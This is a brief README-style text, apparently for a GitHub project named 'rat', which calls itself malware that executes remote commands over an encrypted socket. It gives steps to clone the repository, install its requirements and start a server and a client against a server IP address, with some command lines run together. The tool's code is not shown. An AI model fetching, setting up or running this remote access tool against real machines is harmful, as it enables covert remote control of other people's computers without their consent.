Malware that executes remote commands via an encrypted socket
git clone https://github.com/epg1213/rat
cd rat
python -m venv venv
source venv/bin/activate
pip install -r requirements.txtpython server.py SERVER_IP_ADDRESSpython client.py SERVER_IP_ADDRESS